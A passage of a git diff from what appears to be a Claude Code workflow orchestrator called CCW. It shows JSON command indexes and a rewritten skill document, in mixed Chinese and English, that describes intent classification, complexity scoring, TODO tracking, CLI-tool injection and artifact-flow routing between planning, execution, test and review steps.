"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-context-gather.md"
}
]
}

View File

@@ -1,160 +0,0 @@
{
"workflow:plan": {
"calls_internally": [
"workflow:session:start",
"workflow:tools:context-gather",
"workflow:tools:conflict-resolution",
"workflow:tools:task-generate-agent"
],
"next_steps": [
"workflow:action-plan-verify",
"workflow:status",
"workflow:execute"
],
"alternatives": [
"workflow:tdd-plan"
],
"prerequisites": []
},
"workflow:tdd-plan": {
"calls_internally": [
"workflow:session:start",
"workflow:tools:context-gather",
"workflow:tools:task-generate-tdd"
],
"next_steps": [
"workflow:tdd-verify",
"workflow:status",
"workflow:execute"
],
"alternatives": [
"workflow:plan"
],
"prerequisites": []
},
"workflow:execute": {
"prerequisites": [
"workflow:plan",
"workflow:tdd-plan"
],
"related": [
"workflow:status",
"workflow:resume"
],
"next_steps": [
"workflow:review",
"workflow:tdd-verify"
]
},
"workflow:action-plan-verify": {
"prerequisites": [
"workflow:plan"
],
"next_steps": [
"workflow:execute"
],
"related": [
"workflow:status"
]
},
"workflow:tdd-verify": {
"prerequisites": [
"workflow:execute"
],
"related": [
"workflow:tools:tdd-coverage-analysis"
]
},
"workflow:session:start": {
"next_steps": [
"workflow:plan",
"workflow:execute"
],
"related": [
"workflow:session:list",
"workflow:session:resume"
]
},
"workflow:session:resume": {
"alternatives": [
"workflow:resume"
],
"related": [
"workflow:session:list",
"workflow:status"
]
},
"workflow:lite-plan": {
"calls_internally": [
"workflow:lite-execute"
],
"next_steps": [
"workflow:lite-execute",
"workflow:status"
],
"alternatives": [
"workflow:plan"
],
"prerequisites": []
},
"workflow:lite-fix": {
"next_steps": [
"workflow:lite-execute",
"workflow:status"
],
"alternatives": [
"workflow:lite-plan"
],
"related": [
"workflow:test-cycle-execute"
]
},
"workflow:lite-execute": {
"prerequisites": [
"workflow:lite-plan",
"workflow:lite-fix"
],
"related": [
"workflow:execute",
"workflow:status"
]
},
"workflow:review-session-cycle": {
"prerequisites": [
"workflow:execute"
],
"next_steps": [
"workflow:review-fix"
],
"related": [
"workflow:review-module-cycle"
]
},
"workflow:review-fix": {
"prerequisites": [
"workflow:review-module-cycle",
"workflow:review-session-cycle"
],
"related": [
"workflow:test-cycle-execute"
]
},
"memory:docs": {
"calls_internally": [
"workflow:session:start",
"workflow:tools:context-gather"
],
"next_steps": [
"workflow:execute"
]
},
"memory:skill-memory": {
"next_steps": [
"workflow:plan",
"cli:analyze"
],
"related": [
"memory:load-skill-memory"
]
}
}

View File

@@ -1,112 +0,0 @@
[
{
"name": "lite-plan",
"command": "/workflow:lite-plan",
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-plan.md"
},
{
"name": "lite-fix",
"command": "/workflow:lite-fix",
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-fix.md"
},
{
"name": "plan",
"command": "/workflow:plan",
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
"arguments": "\\\"text description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/plan.md"
},
{
"name": "execute",
"command": "/workflow:execute",
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
"arguments": "[--resume-session=\\\"session-id\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/execute.md"
},
{
"name": "start",
"command": "/workflow:session:start",
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/start.md"
},
{
"name": "review-session-cycle",
"command": "/workflow:review-session-cycle",
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-session-cycle.md"
},
{
"name": "docs",
"command": "/memory:docs",
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs.md"
},
{
"name": "artifacts",
"command": "/workflow:brainstorm:artifacts",
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
"arguments": "topic or challenge description [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/artifacts.md"
},
{
"name": "action-plan-verify",
"command": "/workflow:action-plan-verify",
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/action-plan-verify.md"
},
{
"name": "version",
"command": "/version",
"description": "Display Claude Code version information and check for updates",
"arguments": "",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/version.md"
}
]

View File

@@ -1,462 +1,352 @@
---
name: ccw
description: Stateless workflow orchestrator that automatically selects and executes the optimal workflow combination based on task intent. Supports rapid (lite-plan+execute), full (brainstorm+plan+execute), coupled (plan+execute), bugfix (lite-fix), and issue (multi-point fixes) workflows. Triggers on "ccw", "workflow", "自动工作流", "智能调度".
allowed-tools: Task(*), SlashCommand(*), AskUserQuestion(*), Read(*), Bash(*), Grep(*)
description: Stateless workflow orchestrator. Auto-selects optimal workflow based on task intent. Triggers "ccw", "workflow".
allowed-tools: Task(*), SlashCommand(*), AskUserQuestion(*), Read(*), Bash(*), Grep(*), TodoWrite(*)
---
# CCW - Claude Code Workflow Orchestrator
无状态工作流协调器,根据任务意图自动选择并执行最优工作流组合
无状态工作流协调器,根据任务意图自动选择最优工作流。
## Architecture Overview
## Architecture
```
┌─────────────────────────────────────────────────────────────────┐
│ CCW Orchestrator (Stateless)
│ CCW Orchestrator (CLI-Enhanced + Requirement Analysis)
├─────────────────────────────────────────────────────────────────┤
Input Analysis
├─ Intent Classification (bugfix/feature/refactor/issue/...)
├─ Complexity Assessment (low/medium/high)
├─ Context Detection (codebase familiarity needed?)
└─ Constraint Extraction (time/scope/quality)
Workflow Selection (Decision Tree)
│ ├─ 🐛 Bug? → lite-fix / lite-fix --hotfix │
│ ├─ ❓ Unclear? → brainstorm → plan → execute │
│ ├─ ⚡ Simple? → lite-plan → lite-execute │
│ ├─ 🔧 Complex? → plan → execute │
│ ├─ 📋 Issue? → issue:plan → issue:queue → issue:execute │
│ └─ 🎨 UI? → ui-design → plan → execute │
│ │
│ Execution Dispatch │
│ └─ SlashCommand("/workflow:xxx") or Task(agent) │
│ │
Phase 1 │ Input Analysis (rule-based, fast path)
Phase 1.5 │ CLI Classification (semantic, smart path)
Phase 1.75 │ Requirement Clarification (clarity < 2)
Phase 2 │ Chain Selection (intent → workflow)
Phase 2.5 │ CLI Action Planning (high complexity)
Phase 3 │ User Confirmation (optional)
Phase 4 │ TODO Tracking Setup
Phase 5 │ Execution Loop
└─────────────────────────────────────────────────────────────────┘
```
## Workflow Combinations (组合技)
### 1. Rapid (快速迭代) ⚡
**Pattern**: 多模型协作分析 + 直接执行
**Commands**: `/workflow:lite-plan``/workflow:lite-execute`
**When to use**:
- 明确知道做什么和怎么做
- 单一功能或小型改动
- 快速原型验证
### 2. Full (完整流程) 📋
**Pattern**: 分析 + 头脑风暴 + 规划 + 执行
**Commands**: `/workflow:brainstorm:auto-parallel``/workflow:plan``/workflow:execute`
**When to use**:
- 不确定产品方向或技术方案
- 需要多角色视角分析
- 复杂新功能开发
### 3. Coupled (复杂耦合) 🔗
**Pattern**: 完整规划 + 验证 + 执行
**Commands**: `/workflow:plan``/workflow:action-plan-verify``/workflow:execute`
**When to use**:
- 跨模块依赖
- 架构级变更
- 团队协作项目
### 4. Bugfix (缺陷修复) 🐛
**Pattern**: 智能诊断 + 修复
**Commands**: `/workflow:lite-fix` or `/workflow:lite-fix --hotfix`
**When to use**:
- 任何有明确症状的Bug
- 生产事故紧急修复
- 根因不清楚需要诊断
### 5. Issue (长时间多点修复) 📌
**Pattern**: Issue规划 + 队列 + 批量执行
**Commands**: `/issue:plan``/issue:queue``/issue:execute`
**When to use**:
- 多个相关问题需要批量处理
- 长时间跨度的修复任务
- 需要优先级排序和冲突解决
### 6. UI-First (设计驱动) 🎨
**Pattern**: UI设计 + 规划 + 执行
**Commands**: `/workflow:ui-design:*``/workflow:plan``/workflow:execute`
**When to use**:
- 前端功能开发
- 需要视觉参考
- 设计系统集成
## Intent Classification
```javascript
function classifyIntent(input) {
const text = input.toLowerCase()
// Priority 1: Bug keywords
if (/\b(fix|bug|error|issue|crash|broken|fail|wrong|incorrect)\b/.test(text)) {
if (/\b(hotfix|urgent|production|critical|emergency)\b/.test(text)) {
return { type: 'bugfix', mode: 'hotfix', workflow: 'lite-fix --hotfix' }
}
return { type: 'bugfix', mode: 'standard', workflow: 'lite-fix' }
}
// Priority 2: Issue batch keywords
if (/\b(issues?|batch|queue|多个|批量)\b/.test(text) && /\b(fix|resolve|处理)\b/.test(text)) {
return { type: 'issue', workflow: 'issue:plan → issue:queue → issue:execute' }
}
// Priority 3: Uncertainty keywords → Full workflow
if (/\b(不确定|不知道|explore|研究|分析一下|怎么做|what if|should i|探索)\b/.test(text)) {
return { type: 'exploration', workflow: 'brainstorm → plan → execute' }
}
// Priority 4: UI/Design keywords
if (/\b(ui|界面|design|设计|component|组件|style|样式|layout|布局)\b/.test(text)) {
return { type: 'ui', workflow: 'ui-design → plan → execute' }
}
// Priority 5: Complexity assessment for remaining
const complexity = assessComplexity(text)
if (complexity === 'high') {
return { type: 'feature', complexity: 'high', workflow: 'plan → verify → execute' }
}
if (complexity === 'medium') {
return { type: 'feature', complexity: 'medium', workflow: 'lite-plan → lite-execute' }
}
return { type: 'feature', complexity: 'low', workflow: 'lite-plan → lite-execute' }
}
### Priority Order
| Priority | Intent | Patterns | Flow |
|----------|--------|----------|------|
| 1 | bugfix/hotfix | `urgent,production,critical` + bug | `bugfix.hotfix` |
| 1 | bugfix | `fix,bug,error,crash,fail` | `bugfix.standard` |
| 2 | issue batch | `issues,batch` + `fix,resolve` | `issue` |
| 3 | exploration | `不确定,explore,研究,what if` | `full` |
| 3 | multi-perspective | `多视角,权衡,比较方案,cross-verify` | `multi-cli-plan` |
| 4 | quick-task | `快速,简单,small,quick` + feature | `lite-lite-lite` |
| 5 | ui design | `ui,design,component,style` | `ui` |
| 6 | tdd | `tdd,test-driven,先写测试` | `tdd` |
| 7 | review | `review,审查,code review` | `review-fix` |
| 8 | documentation | `文档,docs,readme` | `docs` |
| 99 | feature | complexity-based | `rapid`/`coupled` |
### Complexity Assessment
```javascript
function assessComplexity(text) {
let score = 0
// Architecture keywords
if (/\b(refactor|重构|migrate|迁移|architect|架构|system|系统)\b/.test(text)) score += 2
// Multi-module keywords
if (/\b(multiple|多个|across|跨|all|所有|entire|整个)\b/.test(text)) score += 2
// Integration keywords
if (/\b(integrate|集成|connect|连接|api|database|数据库)\b/.test(text)) score += 1
// Security/Performance keywords
if (/\b(security|安全|performance|性能|scale|扩展)\b/.test(text)) score += 1
if (score >= 4) return 'high'
if (score >= 2) return 'medium'
return 'low'
if (/refactor|重构|migrate|迁移|architect|架构|system|系统/.test(text)) score += 2
if (/multiple|多个|across|跨|all|所有|entire|整个/.test(text)) score += 2
if (/integrate|集成|api|database|数据库/.test(text)) score += 1
if (/security|安全|performance|性能|scale|扩展/.test(text)) score += 1
return score >= 4 ? 'high' : score >= 2 ? 'medium' : 'low'
}
```
## Execution Flow
| Complexity | Flow |
|------------|------|
| high | `coupled` (plan → verify → execute) |
| medium/low | `rapid` (lite-plan → lite-execute) |
### Phase 1: Input Analysis
### Dimension Extraction (WHAT/WHERE/WHY/HOW)
从用户输入提取四个维度,用于需求澄清和工作流选择:
| 维度 | 提取内容 | 示例模式 |
|------|----------|----------|
| **WHAT** | action + target | `创建/修复/重构/优化/分析` + 目标对象 |
| **WHERE** | scope + paths | `file/module/system` + 文件路径 |
| **WHY** | goal + motivation | `为了.../因为.../目的是...` |
| **HOW** | constraints + preferences | `必须.../不要.../应该...` |
**Clarity Score** (0-3):
- +0.5: 有明确 action
- +0.5: 有具体 target
- +0.5: 有文件路径
- +0.5: scope 不是 unknown
- +0.5: 有明确 goal
- +0.5: 有约束条件
- -0.5: 包含不确定词 (`不知道/maybe/怎么`)
### Requirement Clarification
`clarity_score < 2` 时触发需求澄清:
```javascript
// Parse user input
const input = userInput.trim()
if (dimensions.clarity_score < 2) {
const questions = generateClarificationQuestions(dimensions)
// 生成问题:目标是什么? 范围是什么? 有什么约束?
AskUserQuestion({ questions })
}
```
// Check for explicit workflow request
**澄清问题类型**:
- 目标不明确 → "你想要对什么进行操作?"
- 范围不明确 → "操作的范围是什么?"
- 目的不明确 → "这个操作的主要目标是什么?"
- 复杂操作 → "有什么特殊要求或限制?"
## TODO Tracking Protocol
### CRITICAL: Append-Only Rule
CCW 创建的 Todo **必须附加到现有列表**,不能覆盖用户的其他 Todo。
### Implementation
```javascript
// 1. 使用 CCW 前缀隔离工作流 todo
const prefix = `CCW:${flowName}`
// 2. 创建新 todo 时使用前缀格式
TodoWrite({
todos: [
...existingNonCCWTodos, // 保留用户的 todo
{ content: `${prefix}: [1/N] /command:step1`, status: "in_progress", activeForm: "..." },
{ content: `${prefix}: [2/N] /command:step2`, status: "pending", activeForm: "..." }
]
})
// 3. 更新状态时只修改匹配前缀的 todo
```
### Todo Format
```
CCW:{flow}: [{N}/{Total}] /command:name
```
### Visual Example
```
✓ CCW:rapid: [1/2] /workflow:lite-plan
→ CCW:rapid: [2/2] /workflow:lite-execute
用户自己的 todo保留不动
```
### Status Management
- 开始工作流:创建所有步骤 todo第一步 `in_progress`
- 完成步骤:当前步骤 `completed`,下一步 `in_progress`
- 工作流结束:所有 CCW todo 标记 `completed`
## Execution Flow
```javascript
// 1. Check explicit command
if (input.startsWith('/workflow:') || input.startsWith('/issue:')) {
// User explicitly requested a workflow, pass through
SlashCommand(input)
return
}
// Classify intent
const intent = classifyIntent(input)
// 2. Classify intent
const intent = classifyIntent(input) // See command.json intent_rules
console.log(`
## Intent Analysis
// 3. Select flow
const flow = selectFlow(intent) // See command.json flows
**Input**: ${input.substring(0, 100)}...
**Classification**: ${intent.type}
**Complexity**: ${intent.complexity || 'N/A'}
**Recommended Workflow**: ${intent.workflow}
`)
```
// 4. Create todos with CCW prefix
createWorkflowTodos(flow)
### Phase 2: User Confirmation (Optional)
```javascript
// For high-complexity or ambiguous intents, confirm with user
if (intent.complexity === 'high' || intent.type === 'exploration') {
const confirmation = AskUserQuestion({
questions: [{
question: `Recommended: ${intent.workflow}. Proceed?`,
header: "Workflow",
multiSelect: false,
options: [
{ label: `${intent.workflow} (Recommended)`, description: "Use recommended workflow" },
{ label: "Rapid (lite-plan)", description: "Quick iteration" },
{ label: "Full (brainstorm+plan)", description: "Complete exploration" },
{ label: "Manual", description: "I'll specify the commands" }
]
}]
})
// Adjust workflow based on user selection
intent.workflow = mapSelectionToWorkflow(confirmation)
}
```
### Phase 3: Workflow Dispatch
```javascript
switch (intent.workflow) {
case 'lite-fix':
SlashCommand('/workflow:lite-fix', args: input)
break
case 'lite-fix --hotfix':
SlashCommand('/workflow:lite-fix --hotfix', args: input)
break
case 'lite-plan → lite-execute':
SlashCommand('/workflow:lite-plan', args: input)
// lite-plan will automatically dispatch to lite-execute
break
case 'plan → verify → execute':
SlashCommand('/workflow:plan', args: input)
// After plan, prompt for verify and execute
break
case 'brainstorm → plan → execute':
SlashCommand('/workflow:brainstorm:auto-parallel', args: input)
// After brainstorm, continue with plan
break
case 'issue:plan → issue:queue → issue:execute':
SlashCommand('/issue:plan', args: input)
// Issue workflow handles queue and execute
break
case 'ui-design → plan → execute':
// Determine UI design subcommand
if (hasReference(input)) {
SlashCommand('/workflow:ui-design:imitate-auto', args: input)
} else {
SlashCommand('/workflow:ui-design:explore-auto', args: input)
}
break
}
// 5. Dispatch first command
SlashCommand(flow.steps[0].command, args: input)
```
## CLI Tool Integration
CCW **隐式调用** CLI 工具以获得三大优势
CCW 在特定条件下自动注入 CLI 调用
### 1. Token 效率 (Context Efficiency)
| Condition | CLI Inject |
|-----------|------------|
| 大量代码上下文 (≥50k chars) | `gemini --mode analysis` |
| 高复杂度任务 | `gemini --mode analysis` |
| Bug 诊断 | `gemini --mode analysis` |
| 多任务执行 (≥3 tasks) | `codex --mode write` |
CLI 工具在单独进程中运行,可以处理大量代码上下文而不消耗主会话 token
### CLI Enhancement Phases
| 场景 | 触发条件 | 自动注入 |
|------|----------|----------|
| 大量代码上下文 | 文件读取 ≥ 50k 字符 | `gemini --mode analysis` |
| 多模块分析 | 涉及 ≥ 5 个模块 | `gemini --mode analysis` |
| 代码审查 | review 步骤 | `gemini --mode analysis` |
**Phase 1.5: CLI-Assisted Classification**
### 2. 多模型视角 (Multi-Model Perspectives)
当规则匹配不明确时,使用 CLI 辅助分类:
不同模型有不同优势CCW 根据任务类型自动选择:
| 触发条件 | 说明 |
|----------|------|
| matchCount < 2 | 多个意图模式匹配 |
| complexity = high | 高复杂度任务 |
| input > 100 chars | 长输入需要语义理解 |
| Tool | 核心优势 | 最佳场景 | 触发关键词 |
|------|----------|----------|------------|
| Gemini | 超长上下文、深度分析、架构理解、执行流追踪 | 代码库理解、架构评估、根因分析 | "分析", "理解", "设计", "架构", "诊断" |
| Qwen | 代码模式识别、多维度分析 | Gemini备选、第二视角验证 | "评估", "对比", "验证" |
| Codex | 精确代码生成、自主执行、数学推理 | 功能实现、重构、测试 | "实现", "重构", "修复", "生成", "测试" |
**Phase 2.5: CLI-Assisted Action Planning**
### 3. 增强能力 (Enhanced Capabilities)
高复杂度任务的工作流优化:
#### Debug 能力增强
```
触发条件: intent === 'bugfix' AND root_cause_unclear
自动注入: gemini --mode analysis (执行流追踪)
用途: 假设驱动调试、状态机错误诊断、并发问题排查
```
| 触发条件 | 说明 |
|----------|------|
| complexity = high | 高复杂度任务 |
| steps >= 3 | 多步骤工作流 |
| input > 200 chars | 复杂需求描述 |
#### 规划能力增强
```
触发条件: complexity === 'high' OR intent === 'exploration'
自动注入: gemini --mode analysis (架构分析)
用途: 复杂任务先用CLI分析获取多模型视角
```
CLI 可返回建议:`use_default` | `modify` (调整步骤) | `upgrade` (升级工作流)
### 隐式注入规则 (Implicit Injection Rules)
## Continuation Commands
CCW 在以下条件自动注入 CLI 调用(无需用户显式请求)
工作流执行中的用户控制命令
```javascript
const implicitRules = {
// 上下文收集大量代码使用CLI可节省主会话token
context_gathering: {
trigger: 'file_read >= 50k chars OR module_count >= 5',
inject: 'gemini --mode analysis'
},
// 规划前分析复杂任务先用CLI分析
pre_planning_analysis: {
trigger: 'complexity === "high" OR intent === "exploration"',
inject: 'gemini --mode analysis'
},
// 调试诊断利用Gemini的执行流追踪能力
debug_diagnosis: {
trigger: 'intent === "bugfix" AND root_cause_unclear',
inject: 'gemini --mode analysis'
},
// 代码审查用CLI减少token占用
code_review: {
trigger: 'step === "review"',
inject: 'gemini --mode analysis'
},
// 多任务执行用Codex自主完成
implementation: {
trigger: 'step === "execute" AND task_count >= 3',
inject: 'codex --mode write'
}
}
```
### 用户语义触发 (Semantic Tool Assignment)
```javascript
// 用户可以通过自然语言指定工具偏好
const toolHints = {
gemini: /用\s*gemini|gemini\s*分析|让\s*gemini|深度分析|架构理解/i,
qwen: /用\s*qwen|qwen\s*评估|让\s*qwen|第二视角/i,
codex: /用\s*codex|codex\s*实现|让\s*codex|自主完成|批量修改/i
}
function detectToolPreference(input) {
for (const [tool, pattern] of Object.entries(toolHints)) {
if (pattern.test(input)) return tool
}
return null // Auto-select based on task type
}
```
### 独立 CLI 工作流 (Standalone CLI Workflows)
直接调用 CLI 进行特定任务:
| Workflow | 命令 | 用途 |
|----------|------|------|
| CLI Analysis | `ccw cli --tool gemini` | 大型代码库快速理解、架构评估 |
| CLI Implement | `ccw cli --tool codex` | 明确需求的自主实现 |
| CLI Debug | `ccw cli --tool gemini` | 复杂bug根因分析、执行流追踪 |
## Index Files (Dynamic Coordination)
CCW 使用索引文件实现智能命令协调:
| Index | Purpose |
|-------|---------|
| [index/command-capabilities.json](index/command-capabilities.json) | 命令能力分类explore, plan, execute, test, review... |
| [index/workflow-chains.json](index/workflow-chains.json) | 预定义工作流链rapid, full, coupled, bugfix, issue, tdd, ui... |
### 能力分类
```
capabilities:
├── explore - 代码探索、上下文收集
├── brainstorm - 多角色分析、方案探索
├── plan - 任务规划、分解
├── verify - 计划验证、质量检查
├── execute - 任务执行、代码实现
├── bugfix - Bug诊断、修复
├── test - 测试生成、执行
├── review - 代码审查、质量分析
├── issue - 批量问题管理
├── ui-design - UI设计、原型
├── memory - 文档、知识管理
├── session - 会话管理
└── debug - 调试、问题排查
```
## TODO Tracking Integration
CCW 自动使用 TodoWrite 跟踪工作流执行进度:
```javascript
// 工作流启动时自动创建 TODO 列表
TodoWrite({
todos: [
{ content: "CCW: Rapid Iteration (2 steps)", status: "in_progress", activeForm: "Running workflow" },
{ content: "[1/2] /workflow:lite-plan", status: "in_progress", activeForm: "Executing lite-plan" },
{ content: "[2/2] /workflow:lite-execute", status: "pending", activeForm: "Executing lite-execute" }
]
})
// 每个步骤完成后自动更新状态
// 支持暂停、继续、跳过操作
```
**进度可视化**:
```
✓ CCW: Rapid Iteration (2 steps)
✓ [1/2] /workflow:lite-plan
→ [2/2] /workflow:lite-execute
```
**控制命令**:
| Input | Action |
|-------|--------|
| `continue` | 执行下一步 |
| 命令 | 作用 |
|------|------|
| `continue` | 继续执行下一步 |
| `skip` | 跳过当前步骤 |
| `abort` | 止工作流 |
| `/workflow:*` | 执行指定命令 |
| `abort` | 止工作流 |
| `/workflow:*` | 切换到指定命令 |
| 自然语言 | 重新分析意图 |
## Reference Documents
## Workflow Flow Details
| Document | Purpose |
|----------|---------|
| [phases/orchestrator.md](phases/orchestrator.md) | 编排器决策逻辑 + TODO 跟踪 |
| [phases/actions/rapid.md](phases/actions/rapid.md) | 快速迭代组合 |
| [phases/actions/full.md](phases/actions/full.md) | 完整流程组合 |
| [phases/actions/coupled.md](phases/actions/coupled.md) | 复杂耦合组合 |
| [phases/actions/bugfix.md](phases/actions/bugfix.md) | 缺陷修复组合 |
| [phases/actions/issue.md](phases/actions/issue.md) | Issue工作流组合 |
| [specs/intent-classification.md](specs/intent-classification.md) | 意图分类规范 |
| [WORKFLOW_DECISION_GUIDE.md](/WORKFLOW_DECISION_GUIDE.md) | 工作流决策指南 |
### Issue Workflow (两阶段生命周期)
## Examples
Issue 工作流设计为两阶段生命周期,支持在项目迭代过程中积累问题并集中解决。
**Phase 1: Accumulation (积累阶段)**
- 触发:任务完成后的 review、代码审查发现、测试失败
- 活动需求扩展、bug 分析、测试覆盖、安全审查
- 命令:`/issue:discover`, `/issue:discover-by-prompt`, `/issue:new`
**Phase 2: Batch Resolution (批量解决阶段)**
- 触发:积累足够 issue 后的集中处理
- 流程plan → queue → execute
- 命令:`/issue:plan --all-pending``/issue:queue``/issue:execute`
### Example 1: Bug Fix
```
User: 用户登录失败,返回 401 错误
CCW: Intent=bugfix, Workflow=lite-fix
→ /workflow:lite-fix "用户登录失败,返回 401 错误"
任务完成 → discover → 积累 issue → ... → plan all → queue → parallel execute
↑ ↓
└────── 迭代循环 ───────┘
```
### Example 2: New Feature (Simple)
### lite-lite-lite vs multi-cli-plan
| 维度 | lite-lite-lite | multi-cli-plan |
|------|---------------|----------------|
| **产物** | 无文件 | IMPL_PLAN.md + plan.json + synthesis.json |
| **状态** | 无状态 | 持久化 session |
| **CLI选择** | 自动分析任务类型选择 | 配置驱动 |
| **迭代** | 通过 AskUser | 多轮收敛 |
| **执行** | 直接执行 | 通过 lite-execute |
| **适用** | 快速修复、简单功能 | 复杂多步骤实现 |
**选择指南**
- 任务清晰、改动范围小 → `lite-lite-lite`
- 需要多视角分析、复杂架构 → `multi-cli-plan`
### multi-cli-plan vs lite-plan
| 维度 | multi-cli-plan | lite-plan |
|------|---------------|-----------|
| **上下文** | ACE 语义搜索 | 手动文件模式 |
| **分析** | 多 CLI 交叉验证 | 单次规划 |
| **迭代** | 多轮直到收敛 | 单轮 |
| **置信度** | 高 (共识驱动) | 中 (单一视角) |
| **适用** | 需要多视角的复杂任务 | 直接明确的实现 |
**选择指南**
- 需求明确、路径清晰 → `lite-plan`
- 需要权衡、多方案比较 → `multi-cli-plan`
## Artifact Flow Protocol
工作流产出的自动流转机制,支持不同格式产出间的意图提取和完成度判断。
### 产出格式
| 命令 | 产出位置 | 格式 | 关键字段 |
|------|----------|------|----------|
| `/workflow:lite-plan` | memory://plan | structured_plan | tasks, files, dependencies |
| `/workflow:plan` | .workflow/{session}/IMPL_PLAN.md | markdown_plan | phases, tasks, risks |
| `/workflow:execute` | execution_log.json | execution_report | completed_tasks, errors |
| `/workflow:test-cycle-execute` | test_results.json | test_report | pass_rate, failures, coverage |
| `/workflow:review-session-cycle` | review_report.md | review_report | findings, severity_counts |
### 意图提取 (Intent Extraction)
流转到下一步时,自动提取关键信息:
```
User: 添加用户头像上传功能
CCW: Intent=feature, Complexity=low, Workflow=lite-plan→lite-execute
→ /workflow:lite-plan "添加用户头像上传功能"
plan → execute:
提取: tasks (未完成), priority_order, files_to_modify, context_summary
execute → test:
提取: modified_files, test_scope (推断), pending_verification
test → fix:
条件: pass_rate < 0.95
提取: failures, error_messages, affected_files, suggested_fixes
review → fix:
条件: critical > 0 OR high > 3
提取: findings (critical/high), fix_priority, affected_files
```
### Example 3: Complex Refactoring
### 完成度判断
**Test 完成度路由**:
```
User: 重构整个认证模块,迁移到 OAuth2
CCW: Intent=feature, Complexity=high, Workflow=plan→verify→execute
→ /workflow:plan "重构整个认证模块,迁移到 OAuth2"
pass_rate >= 0.95 AND coverage >= 0.80 → complete
pass_rate >= 0.95 AND coverage < 0.80 → add_more_tests
pass_rate >= 0.80 → fix_failures_then_continue
pass_rate < 0.80 → major_fix_required
```
### Example 4: Exploration
**Review 完成度路由**:
```
User: 我想优化系统性能,但不知道从哪入手
CCW: Intent=exploration, Workflow=brainstorm→plan→execute
→ /workflow:brainstorm:auto-parallel "探索系统性能优化方向"
critical == 0 AND high <= 3 → complete_or_optional_fix
critical > 0 → mandatory_fix
high > 3 → recommended_fix
```
### Example 5: Multi-Model Collaboration
### 流转决策模式
**plan_execute_test**:
```
User: 用 gemini 分析现有架构,然后让 codex 实现优化
CCW: Detects tool preferences, executes in sequence
→ Gemini CLI (analysis) → Codex CLI (implementation)
plan → execute → test
↓ (if test fail)
extract_failures → fix → test (max 3 iterations)
↓ (if still fail)
manual_intervention
```
**iterative_improvement**:
```
execute → test → fix → test → ...
loop until: pass_rate >= 0.95 OR iterations >= 3
```
### 使用示例
```javascript
// 执行完成后,根据产出决定下一步
const result = await execute(plan)
// 提取意图流转到测试
const testContext = extractIntent('execute_to_test', result)
// testContext = { modified_files, test_scope, pending_verification }
// 测试完成后,根据完成度决定路由
const testResult = await test(testContext)
const nextStep = evaluateCompletion('test', testResult)
// nextStep = 'fix_failures_then_continue' if pass_rate = 0.85
```
## Reference
- [command.json](command.json) - 命令元数据、Flow 定义、意图规则、Artifact Flow

View File

@@ -0,0 +1,547 @@
{
"_metadata": {
"version": "2.0.0",
"description": "Unified CCW command index with capabilities, flows, and intent rules"
},
"capabilities": {
"explore": {
"description": "Codebase exploration and context gathering",
"commands": ["/workflow:init", "/workflow:tools:gather", "/memory:load"],
"agents": ["cli-explore-agent", "context-search-agent"]
},
"brainstorm": {
"description": "Multi-perspective analysis and ideation",
"commands": ["/workflow:brainstorm:auto-parallel", "/workflow:brainstorm:artifacts", "/workflow:brainstorm:synthesis"],
"roles": ["product-manager", "system-architect", "ux-expert", "data-architect", "api-designer"]
},
"plan": {
"description": "Task planning and decomposition",
"commands": ["/workflow:lite-plan", "/workflow:plan", "/workflow:tdd-plan", "/task:create", "/task:breakdown"],
"agents": ["cli-lite-planning-agent", "action-planning-agent"]
},
"verify": {
"description": "Plan and quality verification",
"commands": ["/workflow:action-plan-verify", "/workflow:tdd-verify"]
},
"execute": {
"description": "Task execution and implementation",
"commands": ["/workflow:lite-execute", "/workflow:execute", "/task:execute"],
"agents": ["code-developer", "cli-execution-agent", "universal-executor"]
},
"bugfix": {
"description": "Bug diagnosis and fixing",
"commands": ["/workflow:lite-fix"],
"agents": ["code-developer"]
},
"test": {
"description": "Test generation and execution",
